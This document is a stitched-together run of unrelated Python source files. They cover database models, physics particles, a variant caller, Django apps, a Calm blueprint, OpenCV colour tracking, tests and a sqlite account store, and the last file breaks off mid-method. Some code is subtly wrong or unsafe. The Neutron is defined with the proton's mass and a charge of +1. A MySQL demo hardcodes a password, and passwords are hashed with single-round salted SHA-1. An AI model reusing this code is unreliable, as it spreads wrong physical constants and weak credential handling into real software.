Region = sqlalchemy.Column(sqlalchemy.String)
Zip = sqlalchemy.Column(sqlalchemy.String)
Country = sqlalchemy.Column(sqlalchemy.String)
Pin = sqlalchemy.Column(sqlalchemy.String)
Date = sqlalchemy.Column(sqlalchemy.String)
Email = sqlalchemy.Column(sqlalchemy.String)
|
from . import units, constants
_MeVc2 = units.MeV / constants.c ** 2
_e = constants.si.e
class Particle:
_defaults = {
"z": 0
}
def __init__(self, name : str, **kwargs):
self.properties = Particle._defaults.copy()
self.properties.update(kwargs)
@property
def rest_mass(self) -> units.Quantity:
return self.properties["rest_mass"]
@property
def rest_energy(self) -> units.Quantity:
return self.rest_mass * constants.c ** 2
def __call__(self, *args, **kwargs) -> "DynamicParticle":
return DynamicParticle(self, *args, **kwargs)
@property
def z(self) -> units.Quantity:
return self.properties["z"]
@property
def charge(self) -> units.Quantity:
return self.properties["z"] * _e
class DynamicParticle:
def __init__(self, particle : Particle, ekin):
self.particle = particle
self.kinetic_energy = ekin
def __getattr__(self, name):
return getattr(self.particle, name)
@property
def total_energy(self) -> units.Quantity:
return self.particle.rest_energy + self.kinetic_energy
@property
def total_mass(self) -> units.Quantity:
return self.total_energy / constants.c ** 2
@property
def gamma(self) -> float:
return float(self.total_energy / self.particle.rest_energy)
@property
def beta(self) -> float:
import numpy as np
return float(np.sqrt(1 - 1 / self.gamma ** 2))
@property
def velocity(self) -> units.Quantity:
return self.beta * constants.c
Proton = Particle("proton",
rest_mass=938.2720813 * _MeVc2,
z = 1
)
Neutron = Particle("neutron",
rest_mass=938.2720813 * _MeVc2,
z = 1
)
Photon = Particle("photon", rest_mass=0 * _MeVc2)
Electron = Particle("electron",
rest_mass=0.5109989461 * _MeVc2,
z = -1
)
Positron = Particle("positron",
rest_mass=0.5109989461 * _MeVc2,
z = 1
)
|
from Bio import SeqIO, Seq
import re
import itertools
class SubReference():
def __init__(self,reference_file):
reference = next(SeqIO.parse(reference_file,'fasta'))
(self.reference_name,self.min_pos,self.max_pos) = self._parse_label(reference.name)
self._reference_seq = reference.seq
def is_valid_pos(self,pos):
return self.min_pos <= pos < self.max_pos
def _parse_label(self,label):
result = re.match('(?P<ref>\w*):(?P<min>\d*)-(?P<max>\d*)', label)
zero_based_min = int(result.group('min'))-1
zero_based_max = int(result.group('max'))-1
return (result.group('ref'),zero_based_min,zero_based_max)
def __getitem__(self,sliceobj):
sliced_bases = None
if isinstance(sliceobj, int):
sliced_bases= self._reference_seq[sliceobj-self.min_pos]
elif isinstance(sliceobj, slice):
new_slice = slice(sliceobj.start-self.min_pos,sliceobj.stop-self.min_pos,sliceobj.step)
sliced_bases= self._reference_seq[new_slice]
else:
raise TypeError
return sliced_bases.upper()
def __len__(self):
return self.max_pos+1
class HeterozygoteStrategy():
def __call__(self,pileupcolumn,base_probs):
filtered_bases = self._heterogeneous_bases(base_probs)
if len(filtered_bases.keys()) < 2:
filtered_bases = {}
return filtered_bases
def format_output(self,reference_name, pos, called_snvs):
output = ''
for base, stats in called_snvs.iteritems():
output += self._format(reference_name,str(pos),base,stats['prob'],stats['avg'])
return output
def _heterogeneous_bases(self,base_probs):
return dict((base,probs)for base, probs in base_probs.iteritems() if probs['prob'] >= 0.2 and probs['prob'] <= 0.8)
def _format(self,reference, pos, base,prob,avg):
return "{reference}\t{pos}\t{base}\t{prob}\t{avg}\n".format(reference=reference,pos=pos,base=base,prob=prob,avg=avg)
class ReferenceStrategy():
def __init__(self,reference_obj):
self.reference = reference_obj
self._written_header = False
def __call__(self,pileupcolumn,base_probs, frequency_cutoff=0.2):
filtered_probs = {}
reference_pos = pileupcolumn.pos
if self.reference.is_valid_pos(reference_pos):
reference_base = self.reference[reference_pos]
for base,probs in base_probs.iteritems():
if probs['prob'] >= frequency_cutoff:
filtered_probs[base]=probs
if not any(map(lambda base_tuple: base_tuple[0] != reference_base,filtered_probs)):
filtered_probs = {}
return filtered_probs
def format_output(self,reference_name, pos, called_snvs):
if not any(called_snvs):
return ''
output = ''
if not self._written_header:
self._written_header = True
output+= '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n'
chrom_num = re.search('\d+',reference_name).group(0)
ref = self.reference[pos]
alts = []
freqs = []
quals = []
for base, stats in sorted(called_snvs.iteritems(),key=lambda base_tuple: base_tuple[0]):
if base != ref:
alts.append(base)
freqs.append(stats['prob'])
quals.append(stats['avg'])
all_found_bases = called_snvs.keys()
genotypes = self._format_genotypes(all_found_bases,ref,alts)
output += self._format(chrom_num,pos,ref,alts,quals,freqs,genotypes)
return output
def _format_genotypes(self,all_found_bases,ref,alts):
positions = []
for base in all_found_bases:
if base == ref:
positions.append(str(0))
else:
positions.append(str(alts.index(base)+1))
if len(positions) == 1:
return '{}/{}'.format(positions[0],positions[0])
else:
return ','.join(map(lambda x: '/'.join(sorted(x)),itertools.combinations(positions,2)))
def _format(self,chrom_num,pos,ref,alts,quals,freqs,sample,identifier='.',filt='PASS',form='GT'):
info = 'AF={}'.format(','.join(map(lambda x: str(x),freqs)))
alt = ','.join(alts)
return '{chrom_num}\t{pos}\t{id}\t{ref}\t{alt}\t{qual}\t{filter}\t{info}\t{format}\t{sample}\n'\
.format(chrom_num=chrom_num,pos=pos,id=identifier,ref=ref,alt=alt,qual=quals[0],filter=filt,info=info,format=form,sample=sample)
|
# Generated by Django 3.2.2 on 2021-05-06 10:40
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=15)),
('description', models.TextField()),
('points', models.IntegerField(validators=[django.core.validators.MaxValueValidator(10)])),
('assignee', models.ForeignKey(default=None, on_delete=django.db.models.deletion.RESTRICT, related_name='assign', to=settings.AUTH_USER_MODEL)),
],
),
]
|
from textx import metamodel_from_file
from Robot import Robot
from Robot import default
robotlang = metamodel_from_file('robot.tx')
robot_model = robotlang.model_from_file('one.rl')
robotlang.register_obj_processors({'MoveCommand': default})
r1 = Robot()
r1.interpret(robot_model);
input("Program Complete Press Enter to Close"); |
from component import mymysql
from component.mymysql import execute
mymysql.init({
'host': "192.168.121.133",
'port': 3306,
'database': 'laashub',
'user': 'laashub',
'password': 'laashub123',
'charset': 'utf8mb4',
})
if __name__ == '__main__':
target_id = 38
# query all
print(execute("""
select * from designer_data_directory
"""))
# query with condition
print(execute("""
select * from designer_data_directory where id = %(id)s
""", {
"id": target_id
}))
# insert
print(execute("""
insert into designer_data_directory(pid, name) values (%(pid)s,%(name)s)
""", {
"pid": target_id,
"name": "test2"
}))
# update
print(execute("""
update designer_data_directory set name = %(name)s where id = %(id)s
""", {
"id": target_id,
"name": "test",
}))
# delete
print(execute("""
delete from designer_data_directory where id = %(id)s
""", {"id": target_id}))
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from shops.models import Shop
class Category(models.Model):
# shop = models.ForeignKey(Shop, on_delete=models.CASCADE, related_name='categories')
name = models.CharField(max_length=50, verbose_name=_('Name'))
tax = models.FloatField(verbose_name=_('Tax'), default=0)
tax_included = models.BooleanField(verbose_name=_('Tax included'), default=True)
modified = models.DateTimeField(auto_now_add=True, verbose_name=_('Modified'))
order = models.IntegerField(verbose_name=_('Order'), default=255)
is_active = models.BooleanField(default=True, verbose_name=_('Is active'), )
class Meta:
ordering = ('order',)
class Product(models.Model):
name = models.CharField(max_length=200, verbose_name=_('Name'))
text = models.TextField(null=True, blank=True, verbose_name=_('Text'))
image = models.CharField(null=True, blank=True, max_length=250)
shop = models.ForeignKey(Shop, on_delete=models.CASCADE, related_name='products')
category = models.ForeignKey(Category, on_delete=models.SET_NULL, related_name='products', null=True, blank=True)
price = models.FloatField(default=0, verbose_name=_('Sales Price'), )
visible_web = models.BooleanField(default=True, verbose_name=_('Visible for web'), )
archive = models.BooleanField(default=False)
modified = models.DateTimeField(auto_now_add=True, verbose_name=_('Modified'))
|
"""
Calm DSL .DEV Copenhagen Hybrid Cloud Blueprint
author: [email protected]
date: 2019-09-27
"""
from calm.dsl.builtins import ref, basic_cred
from calm.dsl.builtins import action, parallel
from calm.dsl.builtins import CalmTask
from calm.dsl.builtins import CalmVariable
from calm.dsl.builtins import Service, Package, Substrate
from calm.dsl.builtins import Deployment, Profile, Blueprint, PODDeployment
from calm.dsl.builtins import (
provider_spec,
read_provider_spec,
read_spec,
read_local_file,
)
ERA_KEY = read_local_file("era_key")
CENTOS_KEY = read_local_file("centos_key")
KARBON_KEY = read_local_file("karbon_key")
DB_PASSWD = read_local_file("db_passwd")
EraCreds = basic_cred("admin", ERA_KEY, name="era_creds")
CentOsCreds = basic_cred(
"centos", CENTOS_KEY, name="centos_creds", type="KEY", default=True
)
KarbonCreds = basic_cred("admin", KARBON_KEY, name="karbon")
class Postgres(Service):
pass
class WebServer1(Service):
"""WebServer1 AHV Service"""
dependencies = [ref(Postgres)]
@action
def __create__():
CalmTask.Exec.ssh(
name="1CloneRepo",
filename="scripts/webserver/create/CloneRepo.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="2ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="3DatabaseSetup",
filename="scripts/webserver/create/DatabaseSetupAHV.sh",
cred=CentOsCreds,
)
@action
def __start__():
CalmTask.Exec.ssh(
name="1StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
cred=CentOsCreds,
)
@action
def __stop__():
CalmTask.Exec.ssh(
name="1StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
cred=CentOsCreds,
)
class WebServer2(Service):
"""WebServer2 AWS Service"""
dependencies = [ref(Postgres)]
@action
def __create__():
CalmTask.Exec.ssh(
name="1CloneRepo",
filename="scripts/webserver/create/CloneRepo.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="2ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
cred=CentOsCreds,
)
CalmTask.Exec.ssh(
name="3DatabaseSetup",
filename="scripts/webserver/create/DatabaseSetupAWS.sh",
cred=CentOsCreds,
)
@action
def __start__():
CalmTask.Exec.ssh(
name="1StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
cred=CentOsCreds,
)
@action
def __stop__():
CalmTask.Exec.ssh(
name="1StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
cred=CentOsCreds,
)
class WebServerK8s(Service):
"""WebServer Kubernetes Service"""
dependencies = [ref(Postgres)]
class HaProxy(Service):
"""HaProxy Service"""
dependencies = [ref(WebServer1), ref(WebServer2), ref(WebServerK8s)]
class PostgresPackage(Package):
services = [ref(Postgres)]
class WebServer1Package(Package):
services = [ref(WebServer1)]
@action
def __install__():
CalmTask.Exec.ssh(
name="1InstallSoftware",
filename="scripts/webserver/package_install/InstallSoftware.sh",
cred=CentOsCreds,
)
class WebServer2Package(Package):
services = [ref(WebServer2)]
@action
def __install__():
CalmTask.Exec.ssh(
name="1InstallSoftware",
filename="scripts/webserver/package_install/InstallSoftware.sh",
cred=CentOsCreds,
)
class HaProxyPackage(Package):
services = [ref(HaProxy)]
@action
def __install__():
CalmTask.Exec.ssh(
name="1ConfigureHaProxy",
filename="scripts/haproxy/package_install/ConfigureHaProxy.sh",
cred=CentOsCreds,
)
class Era_PostgreSQL_DB(Substrate):
"""Postgres VM provisioned by Era"""
provider_type = "EXISTING_VM"
provider_spec = provider_spec({"address": "@@{DB_SERVER_IP}@@"})
readiness_probe = {
"disabled": True,
"delay_secs": "0",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
@action
def __pre_create__():
CalmTask.SetVariable.escript(
name="1GetClusterID",
filename="scripts/postgres/precreate/1GetClusterID.py",
variables=["CLUSTER_ID", "TIME"],
)
CalmTask.SetVariable.escript(
name="2GetProfileIDs",
filename="scripts/postgres/precreate/2GetProfileIDs.py",
variables=[
"SOFTWARE_PROF_ID",
"COMPUTE_PROF_ID",
"NETWORK_PROF_ID",
"DB_PARAM_ID",
],
)
CalmTask.SetVariable.escript(
name="3GetSLAID",
filename="scripts/postgres/precreate/3GetSLAID.py",
variables=["SLA_ID", "DB_NAME"],
)
CalmTask.SetVariable.escript(
name="4ProvisionDB",
filename="scripts/postgres/precreate/4ProvisionDB.py",
variables=["CREATE_OPERATION_ID"],
)
CalmTask.SetVariable.escript(
name="5MonitorOperation",
filename="scripts/postgres/precreate/5MonitorOperation.py",
variables=["DB_ENTITY_NAME"],
)
CalmTask.SetVariable.escript(
name="6GetDatabaseInfo",
filename="scripts/postgres/precreate/6GetDatabaseInfo.py",
variables=["DB_SERVER_IP", "DB_ID", "DB_SERVER_ID"],
)
@action
def __post_delete__():
CalmTask.SetVariable.escript(
name="1CleanupDB",
filename="scripts/postgres/postdelete/1CleanupDB.py",
variables=["CLEANUP_OPERATION_ID"],
)
CalmTask.Exec.escript(
name="2MonitorCleanupOp",
filename="scripts/postgres/postdelete/2MonitorCleanupOp.py",
)
CalmTask.SetVariable.escript(
name="3DeregisterDBServer",
filename="scripts/postgres/postdelete/3DeregisterDBServer.py",
variables=["DEREGISTER_OPERATION_ID"],
)
CalmTask.Exec.escript(
name="4MonitorDeregOp",
filename="scripts/postgres/postdelete/4MonitorDeregOp.py",
)
class WebServer1_AHV(Substrate):
"""WebServer1 AHV Substrate"""
provider_spec = read_provider_spec("ahv_spec.yaml")
provider_spec.spec["name"] = "wb1-ahv-@@{calm_time}@@"
readiness_probe = {
"disabled": False,
"delay_secs": "0",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
class WebServer2_AWS(Substrate):
"""WebServer2 AWS Substrate"""
provider_type = "AWS_VM"
provider_spec = read_provider_spec("aws_spec.yaml")
provider_spec.spec["name"] = "wb2-aws-@@{calm_time}@@"
readiness_probe = {
"disabled": False,
"delay_secs": "60",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
class HaProxy_AHV(Substrate):
"""HaProxy AHV Substrate"""
provider_spec = read_provider_spec("ahv_spec.yaml")
provider_spec.spec["name"] = "ha-@@{calm_time}@@"
readiness_probe = {
"disabled": False,
"delay_secs": "10",
"connection_type": "SSH",
"connection_port": 22,
"credential": ref(CentOsCreds),
}
class PostgresDeployment(Deployment):
"""Era Postgres Deployment"""
packages = [ref(PostgresPackage)]
substrate = ref(Era_PostgreSQL_DB)
class WebServer1Deployment(Deployment):
"""WebServer1 AHV Deployment"""
packages = [ref(WebServer1Package)]
substrate = ref(WebServer1_AHV)
class WebServer2Deployment(Deployment):
"""WebServer2 AWS Deployment"""
packages = [ref(WebServer2Package)]
substrate = ref(WebServer2_AWS)
class WebServerK8sDeployment(PODDeployment):
"""WebServer Kubernetes Deployment"""
containers = [WebServerK8s]
deployment_spec = read_spec("webserver_deployment.yaml")
service_spec = read_spec("webserver_service.yaml")
dependencies = [ref(PostgresDeployment)]
class HaProxyDeployment(Deployment):
packages = [ref(HaProxyPackage)]
substrate = ref(HaProxy_AHV)
class Default(Profile):
deployments = [
PostgresDeployment,
WebServer1Deployment,
WebServer2Deployment,
WebServerK8sDeployment,
HaProxyDeployment,
]
compute_profile = CalmVariable.WithOptions.Predefined.string(
["DEFAULT_OOB_COMPUTE", "SMALL_COMPUTE", "LARGE_COMPUTE"],
default="DEFAULT_OOB_COMPUTE",
is_mandatory=True,
runtime=True,
)
database_parameter = CalmVariable.Simple(
"DEFAULT_POSTGRES_PARAMS", is_mandatory=True, runtime=True
)
db_prefix = CalmVariable.Simple("psql", is_mandatory=True, runtime=True)
db_password = CalmVariable.Simple(
DB_PASSWD, is_hidden=True, is_mandatory=True, runtime=True
)
era_ip = CalmVariable.Simple(
"",
regex=r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",
is_mandatory=True,
runtime=True,
)
network_profile = CalmVariable.Simple(
"DEFAULT_OOB_NETWORK", is_mandatory=True, runtime=True
)
sla_name = CalmVariable.Simple("GOLD", is_mandatory=True, runtime=True)
software_profile = CalmVariable.Simple(
"POSTGRES_10.4_OOB", is_mandatory=True, runtime=True
)
kubemaster_ip = CalmVariable.Simple("", is_mandatory=True, runtime=True)
@action
def UpdateApp():
"""This action updates the app with the most recent code from git"""
label = CalmVariable.Simple("latest", is_mandatory=True, runtime=True)
with parallel():
CalmTask.Exec.ssh(
name="1RemoveWS1",
filename="scripts/haproxy/updateapp/RemoveWS1.sh",
target=ref(HaProxy),
)
CalmTask.Exec.escript(
name="1UpdateContainers",
filename="scripts/webserver/updateapp/UpdateContainers.py",
target=ref(WebServerK8s),
)
CalmTask.Exec.ssh(
name="2StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="3UpdateFromGit",
filename="scripts/webserver/updateapp/UpdateFromGit.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="4ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="5StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
target=ref(WebServer1),
)
CalmTask.Exec.ssh(
name="6AddWS1",
filename="scripts/haproxy/updateapp/AddWS1.sh",
target=ref(HaProxy),
)
CalmTask.Exec.ssh(
name="7Delay",
filename="scripts/haproxy/updateapp/Delay.sh",
target=ref(HaProxy),
)
CalmTask.Exec.ssh(
name="8RemoveWS2",
filename="scripts/haproxy/updateapp/RemoveWS2.sh",
target=ref(HaProxy),
)
CalmTask.Exec.ssh(
name="9StopWebServer",
filename="scripts/webserver/stop/StopWebServer.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="10UpdateFromGit",
filename="scripts/webserver/updateapp/UpdateFromGit.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="11ConfigureSite",
filename="scripts/webserver/create/ConfigureSite.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="12StartWebServer",
filename="scripts/webserver/start/StartWebServer.sh",
target=ref(WebServer2),
)
CalmTask.Exec.ssh(
name="13AddWS2",
filename="scripts/haproxy/updateapp/AddWS2.sh",
target=ref(HaProxy),
)
class DevCpnhgnHybridDSL(Blueprint):
"""* [Application Link](http://@@{HaProxy.address}@@/)"""
credentials = [EraCreds, CentOsCreds, KarbonCreds]
services = [Postgres, WebServer1, WebServer2, WebServerK8s, HaProxy]
packages = [PostgresPackage, WebServer1Package, WebServer2Package, HaProxyPackage]
substrates = [Era_PostgreSQL_DB, WebServer1_AHV, WebServer2_AWS, HaProxy_AHV]
profiles = [Default]
def main():
print(DevCpnhgnHybridDSL.json_dumps(pprint=True))
if __name__ == "__main__":
main()
|
from custom_envs.envs.quadrotor_14d_env import Quadrotor14dEnv
from custom_envs.envs.double_pendulum_env import DoublePendulumEnv
from custom_envs.envs.diff_drive_env import DiffDriveEnv
from custom_envs.envs.ball_and_beam_env import BallAndBeamEnv
|
""" Test for lib functions """
import os
import unittest
from unittest import mock
from pygyver.etl.lib import bq_token_file_valid
from pygyver.etl.lib import extract_args
from pygyver.etl.lib import remove_first_slash
from pygyver.etl.lib import add_dataset_prefix
from pygyver.etl.lib import apply_kwargs
from pygyver.etl.lib import get_dataset_prefix
def bq_token_file_path_exists_mock(token_path):
"""
Mock bq_token_file_path_exist to return True
"""
return True
class FunctionsinLib(unittest.TestCase):
"""
Unittest class for lib functions
"""
def setUp(self):
self.credential_back_up = os.environ['GOOGLE_APPLICATION_CREDENTIALS']
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'my_path/my_token.json'
def tearDown(self):
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self.credential_back_up
def test_bq_token_file_valid_when_does_not_exists(self):
"""
Tests that bq_token_file_valid raises an ValueError when the file does not exists.
"""
with self.assertRaises(ValueError):
bq_token_file_valid()
def test_bq_token_file_valid(self):
"""
Tests that bq_token_file_valid is True when the file exists (mocked).
"""
with mock.patch('pygyver.etl.lib.bq_token_file_path_exists') as mock_bq_token_file_path_exists:
mock_bq_token_file_path_exists.side_effect = bq_token_file_path_exists_mock
self.assertTrue(
bq_token_file_valid(),
"Token file is not valid"
)
def test_remove_first_slash(self):
self.assertEqual(
remove_first_slash("/sandbox"), "sandbox",
"first slash not removed - wrong"
)
self.assertEqual(
remove_first_slash("sandbox"), "sandbox",
"no first slash - ok"
)
self.assertEqual(
remove_first_slash(""), "",
"empty string - ok"
)
def test_extract_args_1_param(self):
content = [
{
"table_desc": "table1",
"create_table": {
"table_id": "table1",
"dataset_id": "test",
"file": "tests/sql/table1.sql"
},
"pk": ["col1", "col2"],
"mock_data": "sql/table1_mocked.sql"
},
{
"table_desc": "table2",
"create_table": {
"table_id": "table2",
"dataset_id": "test",
"file": "tests/sql/table2.sql"
},
"pk": ["col1"],
"mock_data": "sql/table1_mocked.sql"
}
]
self.assertEqual(
extract_args(content, "pk"),
[["col1", "col2"], ["col1"]],
"extracted ok"
)
self.assertEqual(
extract_args(content, "create_table"),
[
{
"table_id": "table1",
"dataset_id": "test",
"file": "tests/sql/table1.sql"
},
{
"table_id": "table2",
"dataset_id": "test",
"file": "tests/sql/table2.sql"
}
],
"extracted ok"
)
def test_add_dataset_prefix(self):
self.yaml = {
"desc": "test",
"tables":
[
{
"table_desc": "table1",
"create_table": {
"table_id": "table1",
"dataset_id": "test",
},
},
{
"table_desc": "table2",
"create_table": {
"table_id": "table2",
"dataset_id": "test",
},
}
]
}
add_dataset_prefix(
self.yaml,
dataset_prefix='1234_'
)
self.assertEqual(
self.yaml
,
{
"desc": "test",
"tables":
[
{
"table_desc": "table1",
"create_table": {
"table_id": "table1",
"dataset_id": "1234_test",
},
},
{
"table_desc": "table2",
"create_table": {
"table_id": "table2",
"dataset_id": "1234_test",
},
}
]
},
"dataset prefix properly added to dataset_id"
)
def test_get_dataset_prefix(self):
self.assertEqual(
get_dataset_prefix(),
None
)
# See test_pipeline.TestRunReleases() for pipeline based testing
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Reads the most recent maintenace events from a csv into a dictionary. Then
writes that dictionary to a text file in json format.
"""
import csv
import json
# Initialize variables
my_dict = {}
last_asset = ''
# Reads data from csv into a dictionary
with open('mx_raw (1).csv', newline='') as csvfile:
myreader = csv.reader(csvfile, delimiter=',')
next(myreader, None) # skips header row
for row in myreader:
if row[0] != last_asset:
last_asset = row[0]
my_dict[row[0]] = {'description': row[1],'Priority Number': row[10],
'event':[{'work_id': row[2],
'status': row[3],
'event_id': row[4],
'event_name': row[5],
'duration': row[6],
'date': row[7],
'mx_type': row[8],
'mx_kind': row[9]
}]
}
else:
my_dict[last_asset]['event'].append({'work_id': row[2],
'status': row[3],
'event_id': row[4],
'event_name': row[5],
'duration': row[6],
'date': row[7],
'mx_type': row[8],
'mx_kind': row[9]
})
#my_dict.pop('Closed') # deletes empty rows
# Writes dictionary to text file in json format
with open('mx_json.txt', 'w') as outfile:
json.dump(my_dict, outfile) |
import numpy as np
from cv2 import cv2 as cv
def redContours (rect,frame2) :
lower_red = np.array([0,50,50])
upper_red = np.array([10,255,255])
mask2 = cv.inRange(rect, lower_red, upper_red)
redcnts= cv.findContours(mask2,
cv.RETR_TREE,
cv.CHAIN_APPROX_SIMPLE)[-2]
if redcnts :
red_area = max(redcnts, key=cv.contourArea)
(x, y, w, h) = cv.boundingRect(red_area)
imageFrame = cv.rectangle(frame2, (x, y),
(x + w, y + h),
(0, 0, 255), 2)
cv.putText(imageFrame, "Red Colour", (x, y),
cv.FONT_HERSHEY_DUPLEX, 1.0,
(0, 0, 255))
cap = cv.VideoCapture(0)
while 1:
_, frame = cap.read()
hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)
lower_blue = np.array([100,150,0])
upper_blue = np.array([140,255,255])
mask = cv.inRange(hsv, lower_blue, upper_blue)
bluecnts = cv.findContours(mask,
cv.RETR_EXTERNAL,
cv.CHAIN_APPROX_SIMPLE)[-2]
if bluecnts :
blue_area = max(bluecnts, key=cv.contourArea)
(x, y, w, h) = cv.boundingRect(blue_area)
imageFrame = cv.rectangle(frame, (x, y),
(x + w, y + h),
(0, 255, 0), 2)
cv.putText(imageFrame, "Warna Biru", (x, y),
cv.FONT_HERSHEY_DUPLEX, 1.0,
(0, 255, 0))
rect = hsv[y:y+h,x:x+w]
redContours(rect,imageFrame)
cv.imshow('frame',frame)
if cv.waitKey(20) & 0xFF == ord('d'):
break
cap.release()
cv.destroyAllWindows()
|
"""
Ejericio 10
Nota de 10 alumnos y cuantos aprobados y desaprobados
"""
i = 1
aprobado = 0
des_aprobado = 0
while i <= 10:
nota = int(input(f"Ingresa la nota del alumno numero: {i} : "))
i += 1
if nota >= 7:
aprobado += 1
else:
des_aprobado += 1
print(f"TOTAL APROBADOS : {aprobado}")
print(f"TOTAL DES-APROBADOS : {des_aprobado}")
|
'''
Class to help with communicating with the database.
'''
import sqlite3, os, base64, hashlib, csv
from .config import DB_FILE
def create_db():
''' Database created '''
conn = None
c = None
try:
if not os.path.exists(DB_FILE):
# create db connection
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
# create table
c.execute('''CREATE TABLE accounts
(
username text,
password text,
authlevel int
)''')
conn.commit()
c.close()
conn.close()
c = None
conn = None
with open('app/test_credentials.csv') as csv_file:
file = csv.reader(csv_file)
for row in file:
try:
add_user(row[0], row[1], int(row[2]))
except:
print('ERROR: Could not add one of the test credentials to the db.')
return True
else:
print('ERROR: Database already exists')
return False
except Exception:
print("ERROR: Error creating database")
if c is not None:
c.close()
if conn is not None:
conn.close()
return False
finally:
if c is not None:
c.close()
if conn is not None:
conn.close()
def add_user(username, password, auth_level):
''' Add user to database '''
safe_password = salted_pass(password)
data_to_insert = [(username, safe_password, auth_level)]
try:
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
c.executemany('INSERT INTO accounts VALUES (?, ?, ?)', data_to_insert)
conn.commit()
except sqlite3.IntegrityError:
print('ERROR: Attempt to add duplicate record.')
finally:
if c is not None:
c.close()
if conn is not None:
conn.close()
def retrieve_accounts():
''' Retrieves all user accounts from database '''
users = []
try:
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
for row in c.execute('SELECT * FROM accounts'):
users.append(row)
except sqlite3.DatabaseError:
print('Error. Could not retrieve data.')
finally:
try:
if c is not None:
c.close()
if conn is not None:
conn.close()
except Exception:
print("ERROR: It appears you did not run setup.py")
return users
def get_auth_level(username):
# finds correct account and returns auth level
users = retrieve_accounts()
auth_level = ''
for user in users:
if user[0] == username:
auth_level = user[2]
return auth_level
def salted_pass(password):
''' Returns hashed and salted password '''
# generates salt
token = os.urandom(30)
salt = base64.b64encode(token).decode('utf-8')
hashable = salt + password # concatenate salt and plain_text
hashable = hashable.encode('utf-8') # convert to bytes
this_hash = hashlib.sha1(hashable).hexdigest() # hash w/ SHA-1 and hexdigest
return salt + this_hash
if __name__ == '__main__':
print("ERROR: Only run from start.py and setup.py")
|
import os
import os.path
import torch
import numpy as np
import pandas
import csv
import random
from collections import OrderedDict
from .base_video_dataset import BaseVideoDataset
from lib.train.data import jpeg4py_loader
from lib.train.admin import env_settings
'''2021.1.16 Lasot for loading lmdb dataset'''
from lib.utils.lmdb_utils import *
class Lasot_lmdb(BaseVideoDataset):
def __init__(self, root=None, image_loader=jpeg4py_loader, vid_ids=None, split=None, data_fraction=None):
"""
args:
root - path to the lasot dataset.
image_loader (jpeg4py_loader) - The function to read the images. jpeg4py (https://github.com/ajkxyz/jpeg4py)
is used by default.
vid_ids - List containing the ids of the videos (1 - 20) used for training. If vid_ids = [1, 3, 5], then the
videos with subscripts -1, -3, and -5 from each class will be used for training.
split - If split='train', the official train split (protocol-II) is used for training. Note: Only one of
vid_ids or split option can be used at a time.
data_fraction - Fraction of dataset to be used. The complete dataset is used by default
"""
root = env_settings().lasot_lmdb_dir if root is None else root
super().__init__('LaSOT_lmdb', root, image_loader)
self.sequence_list = self._build_sequence_list(vid_ids, split)
class_list = [seq_name.split('-')[0] for seq_name in self.sequence_list]
self.class_list = []
for ele in class_list:
if ele not in self.class_list:
self.class_list.append(ele)
# Keep a list of all classes
self.class_to_id = {cls_name: cls_id for cls_id, cls_name in enumerate(self.class_list)}
if data_fraction is not None:
self.sequence_list = random.sample(self.sequence_list, int(len(self.sequence_list)*data_fraction))
self.seq_per_class = self._build_class_list()
def _build_sequence_list(self, vid_ids=None, split=None):
if split is not None:
if vid_ids is not None:
raise ValueError('Cannot set both split_name and vid_ids.')
ltr_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..')
if split == 'train':
file_path = os.path.join(ltr_path, 'data_specs', 'lasot_train_split.txt')
else:
raise ValueError('Unknown split name.')
sequence_list = pandas.read_csv(file_path, header=None, squeeze=True).values.tolist()
elif vid_ids is not None:
sequence_list = [c+'-'+str(v) for c in self.class_list for v in vid_ids]
else:
raise ValueError('Set either split_name or vid_ids.')
return sequence_list
def _build_class_list(self):
seq_per_class = {}
for seq_id, seq_name in enumerate(self.sequence_list):
class_name = seq_name.split('-')[0]
if class_name in seq_per_class:
seq_per_class[class_name].append(seq_id)
else:
seq_per_class[class_name] = [seq_id]
return seq_per_class
def get_name(self):
return 'lasot_lmdb'
def has_class_info(self):
return True
def has_occlusion_info(self):
return True
def get_num_sequences(self):
return len(self.sequence_list)
def get_num_classes(self):
return len(self.class_list)
def get_sequences_in_class(self, class_name):
return self.seq_per_class[class_name]
def _read_bb_anno(self, seq_path):
bb_anno_file = os.path.join(seq_path, "groundtruth.txt")
